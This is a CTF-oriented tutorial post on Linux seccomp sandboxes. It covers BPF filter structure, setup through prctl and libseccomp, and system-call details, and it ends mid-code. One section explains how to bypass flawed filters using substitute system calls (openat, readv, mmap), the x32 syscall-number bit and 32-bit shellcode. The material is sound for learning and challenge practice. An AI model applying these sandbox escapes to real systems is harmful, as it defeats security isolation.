A First Look at seccomp

ixout

2023-11-04

pwn

sandbox

C sandbox: seccomp

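seccomp (short for secure computing mode) is a security mechanism supported by the Linux kernel. On Linux, a large number of system calls are exposed directly to user-space programs. Not every program needs all of them, however, and unsafe code that abuses system calls can threaten the whole system. With seccomp we can restrict which system calls a program may use, which shrinks the attack surface and puts the program into a "safe" state.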

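On Linux there are generally two ways to set up seccomp: calling prctl directly, or using the seccomp_* functions of the libseccomp library.

Sandboxes in CTF challenges usually forbid execve so that a shell cannot be obtained directly.

The libseccomp functions allocate heap chunks themselves, so the initial heap layout differs from that of a program without the sandbox. This is what people mean when they say the sandbox disturbs the heap feng shui.

The two functions mainly responsible are seccomp_rule_add and seccomp_load, which affect the tcache and fastbin layout.

prctl does not have this effect.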

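History of seccomp

In 2005, Linux 2.6.12 introduced the first version of seccomp. It was enabled by writing "1" to the /proc/PID/seccomp interface, and at first there was only one mode: strict mode. In strict mode the restricted process may use only four system calls: read(), write(), _exit(), and sigreturn(). Note that open() is forbidden too, so any files must be opened before entering strict mode. Once strict mode is applied, any other system call triggers SIGKILL and the process is terminated immediately.

In 2007, Linux 2.6.23 replaced the /proc/PID/seccomp interface with prctl(). prctl(PR_SET_SECCOMP, arg) changes the caller's seccomp mode, and prctl(PR_GET_SECCOMP) queries it. A return value of 0 means seccomp is not applied to the process. In strict mode prctl() is not one of the permitted calls, so the query itself kills the process with SIGKILL and strict mode is never reported. In filter mode (added later, see below) the call returns 2, provided the filter allows prctl().

In 2012, Linux 3.5 introduced "seccomp mode 2", which brought a new mode: filter mode. It uses a Berkeley Packet Filter (BPF) program to filter arbitrary system calls and their arguments. In this mode a process calls prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...) to specify which system calls are allowed. Many applications now use seccomp filters to control system calls, including the Chrome/Chromium browser, OpenSSH, vsftpd, and Firefox OS.

In 2013, Linux 3.8 added a Seccomp field to /proc/PID/status. Reading this file gives the seccomp mode of the process (0 means disabled, 1 means strict, 2 means filter).

In 2014, Linux 3.17 introduced the seccomp() system call. seccomp() offers a superset of the functionality available through prctl() and adds the ability to synchronize all threads of a process to the same set of filters, which helps ensure that even threads created before the filter was installed are covered by it.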
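The Seccomp field in /proc/PID/status mentioned above can be read with a few lines of Python. This is only a sketch: the helper names `seccomp_mode_from_status` and `describe_current_process` are made up for illustration, and the mode names simply follow the 0/1/2 meaning given in the text.

```python
import re

MODE_NAMES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode_from_status(status_text):
    """Return the integer after 'Seccomp:' in /proc/<pid>/status text, or None."""
    match = re.search(r"^Seccomp:\s*(\d+)\s*$", status_text, re.MULTILINE)
    return int(match.group(1)) if match else None


def describe_current_process():
    """Read /proc/self/status and translate the Seccomp field into a name."""
    with open("/proc/self/status") as status_file:
        mode = seccomp_mode_from_status(status_file.read())
    return MODE_NAMES.get(mode, "unknown")
```

Calling `describe_current_process()` in an ordinary shell session would normally report `disabled`; inside a sandboxed challenge binary it should report `filter`.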

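How it works: BPF

BPF stands for Berkeley Packet Filter.

BPF defines a pseudo-machine. This machine can execute code and has an accumulator, an index register, and load/store, arithmetic, and jump instructions. Each instruction is represented by a fixed structure, struct bpf_insn (struct sock_filter in the Linux headers quoted below), which closely resembles real machine code. An array of these structures forms a BPF instruction sequence.

The rest of this section focuses on how BPF is used in CTF sandboxes.

Take a rule that forbids execve as an example: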

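struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4), // load arch (offset 4); the first two instructions check the architecture
BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),    // if arch is not x86_64, skip 2 instructions and land on KILL
BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),    // load 4 bytes at offset 0, i.e. the system call number, into the accumulator
BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),    // if A == 59, fall through to the next instruction, otherwise skip it; 59 is execve on x64
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),     // return KILL
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),    // return ALLOW
};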

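The structures and instruction macros are found in linux/filter.h. A BPF filter is an instruction sequence built from two instruction macros, and that sequence is an array of structures.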

/*
 *    Try and keep these values and structures similar to BSD, especially
 *    the BPF code definitions which need to match so you can share filters
 */

struct sock_filter {    /* Filter block */
    __u16    code;   /* Actual filter code */
    __u8    jt;    /* Jump true */
    __u8    jf;    /* Jump false */
    __u32    k;      /* Generic multiuse field */
};

struct sock_fprog {    /* Required for SO_ATTACH_FILTER. */
    unsigned short        len;    /* Number of filter blocks */
    struct sock_filter __user *filter;
};

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)  ((code) & 0x18)
#define         BPF_A           0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define         BPF_TAX         0x00
#define         BPF_TXA         0x80

/*
 * Macros for filter block array initializers.
 */
#ifndef BPF_STMT // non-jump instructions, typically loads and returns
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP // conditional jump instructions
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif
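To make the layout of struct sock_filter concrete, the sketch below mirrors the two macros in Python and packs instructions into the 8-byte form the kernel receives. The Python names `BPF_STMT`, `BPF_JUMP`, and `pack_filter` are illustrative stand-ins, and little-endian byte order is assumed (as on x86_64).

```python
import struct


def BPF_STMT(code, k):
    """Mirror of the C macro: a non-jump instruction, jt and jf are zero."""
    return (code & 0xFFFF, 0, 0, k & 0xFFFFFFFF)


def BPF_JUMP(code, k, jt, jf):
    """Mirror of the C macro: note that k comes before jt and jf."""
    return (code & 0xFFFF, jt, jf, k & 0xFFFFFFFF)


def pack_filter(instructions):
    """Pack (code, jt, jf, k) tuples as struct sock_filter: u16, u8, u8, u32."""
    return b"".join(struct.pack("<HBBI", *insn) for insn in instructions)
```

Each packed instruction corresponds to one row of a disassembler dump: the columns of such a dump are code, jt, jf, and k.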

linux/seccomp.h defines the structure that the filter reads from. The second argument of BPF_STMT is usually an offset into this structure.

struct seccomp_data {
	int nr;                     // system call number
	__u32 arch;                 // architecture
	__u64 instruction_pointer;
	__u64 args[6];              // system call arguments
};
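The offsets used in BPF load instructions follow directly from this structure. As a quick check, the following sketch rebuilds the layout with ctypes; the class name `SeccompData` and the helper `arg_offsets` are made up for this example, and a little-endian machine is assumed for the low/high word split.

```python
import ctypes


class SeccompData(ctypes.Structure):
    """ctypes mirror of struct seccomp_data from linux/seccomp.h."""
    _fields_ = [
        ("nr", ctypes.c_int),
        ("arch", ctypes.c_uint32),
        ("instruction_pointer", ctypes.c_uint64),
        ("args", ctypes.c_uint64 * 6),
    ]


def arg_offsets(index):
    """Return (low word offset, high word offset) of args[index]."""
    base = SeccompData.args.offset + 8 * index
    return base, base + 4
```

This gives offset 0 for nr and offset 4 for arch, matching the loads in the execve filter, and offsets 0x10 and 0x14 for the two halves of the first argument.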

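linux/bpf_common.h describes the fields of the code argument used by BPF_STMT and BPF_JUMP

#define BPF_CLASS(code) ((code) & 0x07)            // the instruction class comes first
#define        BPF_LD        0x00                  // load a value into A (BPF_LDX loads into X)
#define        BPF_LDX        0x01
#define        BPF_ST        0x02                  // store A (BPF_STX stores X) into scratch memory
#define        BPF_STX        0x03
#define        BPF_ALU        0x04                 // arithmetic or logic on the accumulator, with X or a constant as operand
#define        BPF_JMP        0x05                 // jump instructions
#define        BPF_RET        0x06                 // end the filter; for packets the value says how much to keep (0 drops it all), for seccomp it is the action
#define        BPF_MISC     0x07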


/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)         // operand size for loads
#define        BPF_W        0x00                // word (4 bytes)
#define        BPF_H        0x08                // half word (2 bytes)
#define        BPF_B        0x10                // byte



#define BPF_MODE(code)  ((code) & 0xe0)         // addressing mode of the operand
#define        BPF_IMM        0x00              // immediate value
#define        BPF_ABS        0x20              // absolute offset
#define        BPF_IND        0x40              // indirect offset (relative to X)
#define        BPF_MEM        0x60
#define        BPF_LEN        0x80
#define        BPF_MSH        0xa0



/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)         // for class ALU: the arithmetic or logic operator
#define        BPF_ADD        0x00                    
#define        BPF_SUB        0x10
#define        BPF_MUL        0x20
#define        BPF_DIV        0x30
#define        BPF_OR        0x40
#define        BPF_AND        0x50
#define        BPF_LSH        0x60
#define        BPF_RSH        0x70
#define        BPF_NEG        0x80
#define        BPF_MOD        0x90
#define        BPF_XOR        0xa0
#define        BPF_JA        0x00                    // for class JMP: the jump type
#define        BPF_JEQ        0x10
#define        BPF_JGT        0x20
#define        BPF_JGE        0x30
#define        BPF_JSET        0x40


#define BPF_SRC(code)   ((code) & 0x08)        
#define        BPF_K        0x00                    // constant (the k field)
#define        BPF_X        0x08

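An instruction is made up of several fields, and a rule is written simply by filling in the structure. A filter can contain many instructions. seccomp executes them one by one starting from instruction 0 until it reaches a BPF_RET, which decides whether the system call is allowed or what other action is taken.

Some common instructions:

BPF_STMT(BPF_LD+BPF_W+BPF_ABS,x) loads four bytes from absolute offset x of struct seccomp_data into the accumulator A.

BPF_JUMP(BPF_JMP+BPF_JEQ,x,a,b) compares A with x: if they are equal, the next a instructions are skipped; if not, the next b instructions are skipped.

There are also ALU instructions that operate on the value in the accumulator.

BPF can of course do much more than this and is worth studying in depth.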
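The load, jump, and return semantics described above can be tried out without touching the kernel. The following is a toy interpreter, not the kernel's implementation: it only models BPF_LD+BPF_W+BPF_ABS, three conditional jumps, and BPF_RET, and the names `run_filter` and `pack_seccomp_data` are invented for this sketch. The filter itself is the execve rule from earlier in this article.

```python
import struct

BPF_LD, BPF_JMP, BPF_RET = 0x00, 0x05, 0x06
BPF_W, BPF_ABS, BPF_K = 0x00, 0x20, 0x00
BPF_JEQ, BPF_JGT, BPF_JGE = 0x10, 0x20, 0x30
SECCOMP_RET_KILL, SECCOMP_RET_ALLOW = 0x00000000, 0x7FFF0000
AUDIT_ARCH_X86_64, AUDIT_ARCH_I386 = 0xC000003E, 0x40000003


def BPF_STMT(code, k):
    return (code, 0, 0, k)


def BPF_JUMP(code, k, jt, jf):
    return (code, jt, jf, k)


def pack_seccomp_data(nr, arch, ip=0, args=(0,) * 6):
    """Serialize the fields of struct seccomp_data (little-endian)."""
    return struct.pack("<IIQ6Q", nr & 0xFFFFFFFF, arch, ip, *args)


def run_filter(prog, data):
    """Execute instructions from index 0 until a BPF_RET is reached."""
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        pc += 1
        cls = code & 0x07
        if cls == BPF_LD:                     # only BPF_W | BPF_ABS is modelled
            acc = struct.unpack_from("<I", data, k)[0]
        elif cls == BPF_JMP:
            op = code & 0xF0
            if op == BPF_JEQ:
                taken = acc == k
            elif op == BPF_JGT:
                taken = acc > k
            elif op == BPF_JGE:
                taken = acc >= k
            else:
                raise NotImplementedError(hex(code))
            pc += jt if taken else jf         # offsets count from the next instruction
        elif cls == BPF_RET:
            return k
        else:
            raise NotImplementedError(hex(code))


EXECVE_FILTER = [
    BPF_STMT(BPF_LD + BPF_W + BPF_ABS, 4),
    BPF_JUMP(BPF_JMP + BPF_JEQ, AUDIT_ARCH_X86_64, 0, 2),
    BPF_STMT(BPF_LD + BPF_W + BPF_ABS, 0),
    BPF_JUMP(BPF_JMP + BPF_JEQ, 59, 0, 1),
    BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_ALLOW),
]
```

For example, `run_filter(EXECVE_FILTER, pack_seccomp_data(59, AUDIT_ARCH_X86_64))` returns `SECCOMP_RET_KILL`, while the same call with system call number 1 (write) returns `SECCOMP_RET_ALLOW`.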

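System calls

Two system calls are related to seccomp: prctl and seccomp. On x86_64 their system call numbers are 157 and 317, and the corresponding kernel functions are sys_prctl and sys_seccomp: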

SYSCALL_DEFINE3(seccomp, unsigned int, op, unsigned int, flags,
			 void __user *, uargs)
{
	return do_seccomp(op, flags, uargs);
}

/* Get/set process seccomp mode */
#define PR_GET_SECCOMP	21
#define PR_SET_SECCOMP	22
#define PR_SET_NO_NEW_PRIVS	38
#define PR_GET_NO_NEW_PRIVS	39

SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
		unsigned long, arg4, unsigned long, arg5)
{
    ...
    switch (option) {
        ...
        case PR_GET_SECCOMP:
            error = prctl_get_seccomp();
            break;
        case PR_SET_SECCOMP:
            error = prctl_set_seccomp(arg2, (char __user *)arg3);
            break;
        ...
    }
    ...
}

#define SECCOMP_MODE_DISABLED	0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT	1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER	2 /* uses user-supplied filter. */

long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
	unsigned int op;
	void __user *uargs;

	switch (seccomp_mode) {
	case SECCOMP_MODE_STRICT:
		op = SECCOMP_SET_MODE_STRICT;
		/*
		 * Setting strict mode through prctl always ignored filter,
		 * so make sure it is always NULL here to pass the internal
		 * check in do_seccomp().
		 */
		uargs = NULL;
		break;
	case SECCOMP_MODE_FILTER:
		op = SECCOMP_SET_MODE_FILTER;
		uargs = filter;
		break;
	default:
		return -EINVAL;
	}

	/* prctl interface doesn't have flags, so they are always zero. */
	return do_seccomp(op, 0, uargs);
}

As shown, when the first argument of the prctl system call is PR_SET_SECCOMP, it ends up in the same function as sys_seccomp: do_seccomp. This is the entry point for installing seccomp rules.

/* Common entry point for both prctl and syscall. */
static long do_seccomp(unsigned int op, unsigned int flags,
		       void __user *uargs)
{
	switch (op) {
	case SECCOMP_SET_MODE_STRICT:
		if (flags != 0 || uargs != NULL)
			return -EINVAL;
		return seccomp_set_mode_strict();
	case SECCOMP_SET_MODE_FILTER:
		return seccomp_set_mode_filter(flags, uargs);
	case SECCOMP_GET_ACTION_AVAIL:
		if (flags != 0)
			return -EINVAL;

		return seccomp_get_action_avail(uargs);
	case SECCOMP_GET_NOTIF_SIZES:
		if (flags != 0)
			return -EINVAL;

		return seccomp_get_notif_sizes(uargs);
	default:
		return -EINVAL;
	}
}

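This function is not analyzed further here.

Implementation with prctl

prctl can perform many operations on a process. The first argument selects the operation, so it has a large number of possible values.

In sandboxes, the first argument is usually either 38 (PR_SET_NO_NEW_PRIVS) or 22 (PR_SET_SECCOMP).

38 (PR_SET_NO_NEW_PRIVS)

prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);

For safety, the no_new_privs bit has to be set to 1 with PR_SET_NO_NEW_PRIVS. This lets seccomp filters work for every user, including unprivileged ones, and keeps child processes, that is, the program image after execve, under the same restrictions. Once set, the bit cannot be changed back: even if prctl can still be called, it cannot be disabled again.

22 (PR_SET_SECCOMP)

When the second argument is SECCOMP_MODE_STRICT (1), the third argument is not needed, and only a few system calls are allowed: read, write, _exit (not exit_group), and sigreturn.
When the second argument is SECCOMP_MODE_FILTER (2), the restrictions on system calls are defined by the filter structure passed as the third argument.

prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);

&prog points to the filter rules we defined.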

An example

#include <stdio.h>
#include <stdlib.h>          // system()
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>

void sandbox(){
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),// 0xc000003e is ARCH_X86_64
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}

int main() {
    sandbox();
    printf("start!\n");
    system("id");            // the child is killed as soon as it calls execve
    return 0;
}

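Setting up the sandbox uses the xmm registers, so a long run of hard-to-read xmm register operations in a binary is most likely preparation for the sandbox that follows.

Implementation with the seccomp functions

seccomp_init initializes the filter context. If its argument is SCMP_ACT_ALLOW, the filter works as a blacklist. If it is SCMP_ACT_KILL, the filter works as a whitelist: every system call that matches no rule kills the process, so no system call is allowed by default.

seccomp_rule_add adds one rule. An arg_cnt of 0 means that the system call (execve in the example) is restricted whatever its arguments are. If arg_cnt is nonzero, it is the number of argument conditions that follow, and the call is only intercepted when execve is invoked and its arguments satisfy those conditions.

seccomp_load applies the filter. Without the call to seccomp_load, none of the rules above take effect.

Note: append -lseccomp at the end of the compile command.

An example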

#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>
void sandbox(){
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_ALLOW);                         // default action: allow (blacklist)
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);  // kill on execve, whatever its arguments
    //......
    seccomp_load(ctx);                                          // install the filter
}
int main(void){
    sandbox();
    char * str = "/bin/sh";
    write(1,"hello world\n",12);
    syscall(59,str,NULL,NULL);// execve, killed by the filter
    return 0;
}

seccomp_init returns a scmp_filter_ctx filter context.

The valid values of def_action are:

SCMP_ACT_KILL
SCMP_ACT_KILL_PROCESS
SCMP_ACT_TRAP
SCMP_ACT_ERRNO
SCMP_ACT_TRACE
SCMP_ACT_LOG
SCMP_ACT_ALLOW

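Of these, SCMP_ACT_KILL as the default gives a whitelist, and SCMP_ACT_ALLOW gives a blacklist.

seccomp_rule_add adds a rule:

int seccomp_rule_add(scmp_filter_ctx ctx, uint32_t action,int syscall, unsigned int arg_cnt, ...);

arg_cnt is the number of argument comparisons that follow, for example: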

rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 3,
                      SCMP_A0(SCMP_CMP_EQ, fd),
                      SCMP_A1(SCMP_CMP_EQ, (scmp_datum_t)buf),
                      SCMP_A2(SCMP_CMP_LE, BUF_SIZE));
rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 1,
                      SCMP_CMP(0, SCMP_CMP_EQ, fd));
rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

Here the counts are 3, 1, and 0. Each of the following arguments carries a comparison op; the main ones are:

SCMP_CMP_NE
Matches when the argument value is not equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_NE , datum )

SCMP_CMP_LT
Matches when the argument value is less than the datum value, example:

SCMP_CMP( arg , SCMP_CMP_LT , datum )

SCMP_CMP_LE
Matches when the argument value is less than or equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_LE , datum )

SCMP_CMP_EQ
Matches when the argument value is equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_EQ , datum )

SCMP_CMP_GE
Matches when the argument value is greater than or equal to the datum value, example:

SCMP_CMP( arg , SCMP_CMP_GE , datum )

SCMP_CMP_GT
Matches when the argument value is greater than the datum value, example:

SCMP_CMP( arg , SCMP_CMP_GT , datum )

SCMP_CMP_MASKED_EQ
Matches when the masked argument value is equal to the masked datum value, example:

SCMP_CMP( arg , SCMP_CMP_MASKED_EQ , mask , datum )

seccomp_load simply applies the filter.

Common seccomp filters in CTF and how to bypass them

1. execve disabled

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x04 0xc000003e  if (A != ARCH_X86_64) goto 0006
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x02 0x00 0x40000000  if (A >= 0x40000000) goto 0006
0004: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0006: 0x06 0x00 0x00 0x00000000  return KILL

This kind can be handled by reading the flag with open, read, and write.

2. execve, open, close, write, and read disabled

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
0005: 0x15 0x05 0x00 0x00000000  if (A == read) goto 0011
0006: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0011
0007: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003  if (A == close) goto 0011
0009: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0011: 0x06 0x00 0x00 0x00000000  return KILL

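open and openat end up in the same kernel code path (the glibc open() wrapper itself uses the openat system call), so openat can be called directly. Besides read and write there are two more calls,

readv and writev, and together these bypass the restriction and read the flag. If even openat is disabled, ptrace can be used to modify the system call.

3. execve disabled, with open, write, and read restricted by argument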

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
0005: 0x15 0x06 0x00 0x00000002  if (A == open) goto 0012
0006: 0x15 0x00 0x06 0x00000000  if (A != read) goto 0013
0007: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # read(fd, buf, count)
0008: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0012
0009: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0013
0010: 0x20 0x00 0x00 0x00000010  A = fd # read(fd, buf, count)
0011: 0x35 0x00 0x01 0x00000004  if (A < 0x4) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0013: 0x06 0x00 0x00 0x00000000  return KILL

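When arguments are restricted, look for the weak point in the argument checks. In the dump above, read is only allowed when fd >= 4, so opening the flag file more than once is enough to get a usable descriptor.

4. Incomplete check on sys_number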

0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x15 0x05 0x00 0x00000002  if (A == open) goto 0009
0004: 0x15 0x04 0x00 0x00000009  if (A == mmap) goto 0009
0005: 0x15 0x03 0x00 0x00000065  if (A == ptrace) goto 0009
0006: 0x15 0x02 0x00 0x00000101  if (A == openat) goto 0009
0007: 0x15 0x01 0x00 0x00000130  if (A == open_by_handle_at) goto 0009
0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
0009: 0x06 0x00 0x00 0x00000000  return KILL

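There is no check for if (A < 0x40000000).

As a result the filter can be bypassed with 0x40000000+sys_number (sys_number |= 0x40000000), which selects the x32 ABI variant of the same system call on kernels built with x32 support.

Likewise, if the check if (A != ARCH_X86_64) is missing,

the filter can be bypassed with 32-bit shellcode, because the 32-bit system call numbers differ from the 64-bit ones.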
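The x32 case can be illustrated with a small model of filter 4. This is a simplified stand-in for the BPF program, not a real filter: the function names are hypothetical, and whether the kernel actually accepts the x32 number depends on its configuration.

```python
X32_SYSCALL_BIT = 0x40000000

# System call numbers that filter 4 compares against.
BLOCKED = {2: "open", 9: "mmap", 101: "ptrace", 257: "openat", 304: "open_by_handle_at"}


def filter_without_range_check(nr):
    """Model of filter 4: only exact matches on the number are killed."""
    return "KILL" if nr in BLOCKED else "ALLOW"


def filter_with_range_check(nr):
    """Same blacklist, preceded by the 'A >= 0x40000000' test of filter 1."""
    if nr >= X32_SYSCALL_BIT:
        return "KILL"
    return filter_without_range_check(nr)
```

With the bit set, the number 0x40000002 no longer equals 2, so the blacklist comparison misses it, while the version with the range check rejects it outright.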

Substitutes for some system calls

Using x86_64 as the example

The read family

read

System call number: 0

glibc wrapper: ssize_t read(int fd, void *buf, size_t count);

Usage:

#include <stdio.h>
#include <fcntl.h>    // open
#include <unistd.h>   // read, write
char buf[64];

int main()
{
	int fd = open("flag", 0);   // 0 is O_RDONLY

	read(fd,buf,40);

	write(1,buf,40);

	return 0;
}

readv

System call number: 19

glibc wrapper: ssize_t readv(int fd, const struct iovec *iov, int iovcnt);

Usage:

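#include <stdio.h>
#include <fcntl.h>    // open
#include <unistd.h>   // write
#include <sys/uio.h>  // readv, struct iovec
char buf[64];

int main()
{
	int fd = open("flag", 0);

	// a single iovec entry describing the destination buffer
	struct iovec vec;
	vec.iov_base = buf;
	vec.iov_len = 64;

	readv(fd,&vec,1);

	write(1,buf,40);

	return 0;
}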

pread64

System call number: 17

glibc wrapper: ssize_t pread(int fd, void *buf, size_t count, off_t offset);

Usage:

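#include <stdio.h>
#include <fcntl.h>    // open
#include <unistd.h>   // pread, write
char buf[64];

int main()
{
	int fd = open("flag", 0);

	pread(fd,buf,40,0);         // read 40 bytes starting at file offset 0

	write(1,buf,40);

	return 0;
}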

preadv

System call number: 295

glibc wrapper: ssize_t preadv(int fd, const struct iovec *iov, int iovcnt, off_t offset);

Usage:

preadv2

System call number: 327

glibc wrapper: ssize_t preadv2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

Usage:
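For the vectored reads, a quick way to experiment is Python's os module, whose `os.readv` and `os.preadv` functions wrap the corresponding system calls on Linux. The sketch below is only an illustration of the calling pattern; the helper name `read_with_vectors` and the 64-byte default are assumptions of this example.

```python
import os
import tempfile


def read_with_vectors(path, size=64):
    """Read the start of a file twice: once with preadv, once with readv."""
    fd = os.open(path, os.O_RDONLY)
    try:
        positional = bytearray(size)
        # preadv reads at an explicit offset and leaves the file position alone
        n_positional = os.preadv(fd, [positional], 0)
        sequential = bytearray(size)
        # readv reads from the current file position, which is still 0 here
        n_sequential = os.readv(fd, [sequential])
        return bytes(positional[:n_positional]), bytes(sequential[:n_sequential])
    finally:
        os.close(fd)
```

In shellcode the same idea applies: build one iovec entry pointing at a writable buffer and issue system call 19 or 295 instead of 0.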

The write family

write

System call number: 1

glibc wrapper: ssize_t write(int fd, const void *buf, size_t count);

Usage:

writev

System call number: 20

glibc wrapper: ssize_t writev(int fd, const struct iovec *iov, int iovcnt);

Usage:

pwrite64

System call number: 18

glibc wrapper: ssize_t pwrite(int fd, const void *buf, size_t count, off_t offset);

Usage:

pwritev

System call number: 296

glibc wrapper: ssize_t pwritev(int fd, const struct iovec *iov, int iovcnt, off_t offset);

Usage:

pwritev2

System call number: 328

glibc wrapper: ssize_t pwritev2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

Usage:
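The vectored writes can be tried the same way through Python's `os.writev` and `os.pwritev`, which wrap the system calls of the same names on Linux. This is a minimal sketch; the helper names are made up for the example.

```python
import os
import tempfile


def write_with_vectors(fd, chunks):
    """Send several byte strings with one writev call; returns bytes written."""
    return os.writev(fd, chunks)


def pwrite_with_vectors(fd, chunks, offset):
    """Like writev, but at an explicit file offset (fd must be seekable)."""
    return os.pwritev(fd, chunks, offset)
```

For example, `write_with_vectors(1, [b"flag", b"{demo}\n"])` prints both pieces to standard output with a single system call, which is useful when write itself is filtered but writev is not.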

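The open family

open

System call number: 2

glibc wrapper: int open(const char *pathname, int flags, mode_t mode);

Usage:

openat

System call number: 257

glibc wrapper: int openat(int dirfd, const char *pathname, int flags, mode_t mode);

Usage:

dirfd: a directory file descriptor. It can be a descriptor of an open directory, or the special value AT_FDCWD (-100), which makes relative paths resolve against the current working directory.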

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <dir> <file>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    const char *dir = argv[1];
    const char *file = argv[2];

    // open the directory
    int dirfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dirfd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    // use openat to open the file relative to that directory
    int fd = openat(dirfd, file, O_RDONLY);
    if (fd == -1) {
        perror("openat");
        close(dirfd);
        exit(EXIT_FAILURE);
    }

    printf("File %s opened successfully\n", file);

    // close the file and directory descriptors
    close(fd);
    close(dirfd);

    return 0;
}

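openat2

A system call added in Linux 5.6 (number 437 on x86_64); it is an extended version of openat.

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/openat2.h>

int openat2(int dirfd, const char *pathname,
            struct open_how *how, size_t size);

With pwntools, the call can be generated as follows, where -100 is AT_FDCWD and flag_addr+0x40 is assumed to point to a zero-filled struct open_how:

asm(shellcraft.openat2(-100,flag_addr,flag_addr+0x40,0x40))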

Bypassing some restrictions

If every read-type call is disabled

Map the file directly into memory with mmap:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <filename>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    const char *filename = argv[1];

    // open the file
    int fd = open(filename, O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    // get the file size
    struct stat sb;
    if (fstat(fd, &sb) == -1) {
        perror("fstat");
        exit(EXIT_FAILURE);
    }

    // map the file into memory
    char *mapped = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (mapped == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    // close the file descriptor (the mapping stays valid)
    close(fd);

    // print the mapped file contents
    write(STDOUT_FILENO, mapped, sb.st_size);

    // unmap the file
